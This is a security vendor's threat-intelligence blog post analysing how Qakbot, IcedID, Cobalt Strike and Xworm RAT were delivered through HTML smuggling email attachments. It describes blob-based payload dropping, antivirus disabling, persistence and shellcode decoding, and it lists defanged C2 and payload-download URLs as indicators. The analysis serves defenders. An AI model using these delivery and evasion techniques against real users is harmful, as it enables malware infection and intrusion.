Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

HTML Smuggling: The Hidden Threat in Your Inbox

Last October, Trustwave SpiderLabs blogged about the use and prevalence of HTML email attachments to deliver malware and phishing for credentials. The use of HTML smuggling has become more prevalent, and we have since seen various cybercriminal groups utilizing these techniques to distribute malware.

HTML smuggling employs HTML5 attributes that can work offline by storing a binary in an immutable blob of data within JavaScript code. The data blob, or the embedded payload, gets decoded into a file object when opened via a web browser. Threat actors take advantage of the versatility of HTML in combination with social engineering to lure the user into saving and opening the malicious payload.

HTML smuggling is not new, but it has gained in popularity, especially after Microsoft started blocking macros in documents from the Internet by default. What did not change is the use of HTML smuggling to deliver the initial payload. The intermediate payload varies from ISO, IMG, and VHD image files.

The latest campaigns impersonate well-known brands like Adobe Acrobat, Google Drive, and Dropbox to increase the chances of users opening the archives.

In this blog, we will cover some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.


Qakbot, one of the notorious malware types actively distributed through spam, has been using HTML smuggling since June 2022. It shifted from macro documents to HTML as Microsoft pushed restrictions on using macros from the Internet.


Figure 1: Qakbot is delivered via HTML attachments as seen in our spam traps.

A Qakbot email campaign from September 2022 uses a plain template and does not impersonate well-known brands. Instead, the malware tricks the user into clicking the HTML attachment, which causes an encrypted ZIP archive to be saved to disk. The email and the HTML attachment contain the password to extract the ZIP content.


Figure 2: Spam email delivering Qakbot via an HTML attachment


Figure 3: HTML smuggling template

Looking at the HTML source code, the functions, and methods used to assemble the payload are obfuscated into arrays. This attempts to conceal suspicious commands and evade email gateway filters. This technique abuses the JavaScript function msSaveOrOpenBlob to dynamically generate and drop the malicious payload to disk.


Figure 4: Obfuscated JavaScript code used for payload smuggling


Figure 5: ZIP archive drop containing a Windows Shortcut LNK

The ZIP archive dropped contains one file, a Windows Shortcut (LNK). Once the user opens the ZIP archive and launches the LNK file, it invokes the Windows Command Processor which creates a download folder inside the %LOCAPPDATA% directory and downloads and executes a JavaScript using the built-in curl tool and WScript, respectively. The JavaScript file downloads the main payload, a Qakbot DLL. The payload is loaded using rundll32 and then injected into explorer.exe through process hollowing.


Figure 6: Infection chain of the Qakbot campaign


Figure 7: Qakbot campaign impersonating Google Drive


Another infamous malware strain, IcedID also known as Bokbot, has been observed using HTML smuggling. There is some overlap in the method of delivery between IcedID and Qakbot, as the HTML templates we saw were nearly identical.


Figure 8: Thread-hijacked email delivering IcedID


Figure 9: HTML template spoofing a PDF viewer to lure targets to install IcedID

In this sample, IcedID was delivered through a thread-hijacked email with an HTML attachment. A thread-hijacked email contains malicious messages, links, or attachments that were inserted by threat actors into a legitimate email conversation. After loading in the browser, the HTML, impersonating a PDF document viewer, drops a password-protected ZIP archive with an embedded ISO disk image file. The HTML template contains the archive’s password. Inside the ISO file is an LNK file, a decoy PNG image, and the IcedID DLL. Clicking the LNK file starts the command line to load the decoy PNG image, while in the background, rundll32 loads the initial IcedID DLL with the PluginInit parameter.


Figure 10: Command line to load decoy PNG image


Figure 11: Infection chain of IcedID campaign

Since 2017, IcedID has implemented a range of delivery methods favoring email as its initial access vector. It started as a banking trojan targeting financial institutions but has since evolved into a dropper of additional malware payloads, like ransomware, and has become an initial access provider for other threat actors seeking to establish a foothold on a target system.

Cobalt Strike

More recently, in December we came across a spam email with an HTML attachment dropping Cobalt Strike. The HTML lure looks similar to the Qakbot and IcedID campaigns.


Figure 12: Infection chain of Cobalt Strike delivery through email with an HTML attachment


Figure 13: PDF viewer-themed HTML lure delivering Cobalt Strike


Figure 14: ISO package containing LNK shortcut, PowerShell scripts including Cobalt Strike, and a decoy document

When the HTML is loaded, it drops an ISO file containing an LNK file that, when clicked, launches the payload execution sequence. The LNK file starts PowerShell to execute the PowerShell script masqueraded in a ‘.log’ extension rather than ‘.ps1’. Modifying the extension attempts to evade defenses and tricks the user into thinking that it is a typical log file.


Figure 15: PowerShell script

The initial PowerShell script sets the groundwork for the successful execution of the Cobalt Strike payload. The script checks if the target system is part of a domain. Then, it disables Microsoft Defender’s real-time monitoring followed by the creation of an LNK shortcut file pointing to the Cobalt Strike payload in the Startup folder as a form of persistence. Otherwise, it loads the decoy PDF document and terminates the sequence.

To conceal the malicious activity the script loads the decoy PDF document before launching the main payload.


Figure 16: First stage PS1 script disabling antivirus, checking the system configuration, and setting up persistence

The initial and main PowerShell scripts simply obfuscate their variables and functions using random and lengthy names. For the sake of readability, we have modified the variable names making them shorter.


Figure 17: Cobalt Strike with base64-encoded shellcode

Before memory injection, the Cobalt Strike shellcode decodes from base64 then bitwise XOR with the key, 35. It connects to its C2 server at hxxp[://]165[.]22[.]48[.]183/common?chunk=false.

Xworm RAT

One of the interesting samples we uncovered in our spam traps is an Xworm RAT, which is a .NET-compiled malware capable of monitoring user activities including keystrokes and screen activities.


Figure 18: Email campaign delivering the Xworm RAT

The email purports to be from the U.S. Postal System with the subject line reading “Your shipment is out for delivery” and includes an HTML file attachment. When the recipient opens the HTML, it will be loaded in the browser and automatically drops an ISO disk image to the target system.

The ISO file contains a Visual Basic Script (VBS) file. The user must open the ISO file for it to be mounted and double-click the VBScript code for the infection chain to continue.

When executed, the VBScript code launches PowerShell commands to retrieve two encoded blobs. Below is the final PowerShell command launched:


Figure 19: Final PowerShell command launch

The first blob is retrieved from hxxp://5[.]42[.]199[.]235/dll/dll2.txt. Then, the PowerShell script decodes the base64 encoded blob into a DLL file. This first DLL has the following capabilities:

  • Creates a copy of the VBS file in the Startup folder
  • Sets the VBS persistence through a scheduled task
  • Downloads the stager DLL which will serve as the loader of the second blob or the main payload

The second blob is downloaded from hxxps://beautiful-elion[.]68-64-160-26[.]plesk[.]page/weslle.txt. Like the first blob, the base64 encoded file is converted into a DLL file. We found that this main payload turns out to be an Xworm RAT.  

The code shown below is from the first DLL, and highlighted is the method “PUlGKA” which is invoked through the VBScript command. It downloads and decodes the stager DLL from hxxp:// 5[.]42[.]199[.]235/pe/Pe.txt. From there, the stager manages the execution of Xworm DLL through the built-in Windows command Regasm.


Figure 20: PUlGKA method


Figure 21: Attack sequence of a campaign that starts from email then ends with Xworm RAT dropped.


The shift in malware delivery methods to using HTML is concerning, as it challenges email gateway scanners, endpoint protection, and security solutions, especially their ability to unpack, decode and detect such techniques. With HTML smuggling, the malware is concealed from the scanners as most AVs will see the HTML attachment only compared to using an ISO file attachment, which will immediately throw red flags. Combining HTML smuggling with archives and disk images as intermediate payload raises the chances of delivering malware and gaining initial access. Threat actors are crafty in their lures, mixing various social engineering techniques and exploring different attack chains to gain a foothold on the target’s system.

We expect to see more sophisticated malware delivered through HTML smuggling with more compelling lures impersonating well-known products and social engineering tricks, complex obfuscation on the HTML level evading signature-based detection, and diverse attack sequences that may require more user interaction but may still be effective to gain initial access.

We always remind everyone to stay vigilant in this ever-changing digital landscape. 


Indicators of Compromise









_OIV.dll (Qakbot DLL)


jackboots. tmp (Qakbot DLL)


PE40.vhd (VHD containing Qakbot)


Download URL for JS


Download URL for DLL (Qakbot)











0e7132bf-c75b-4ff9-ab6a-0db25f7250a4.W6_ (IcedID DLL)












bbftullzytwpbp.log (PS1 stager)


fwoebcdndjhrmrn.log (PS1 CobaltStrike)


vqulmjurow.pdf (Decoy PDF document)


C2 server










dll2.txt (Initial DLL)


weslle.txt (Xworm)


Pe.txt (Stager DLL)




hxxp:// 5[.]42[.]199[.]235/pe/Pe.txt





Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More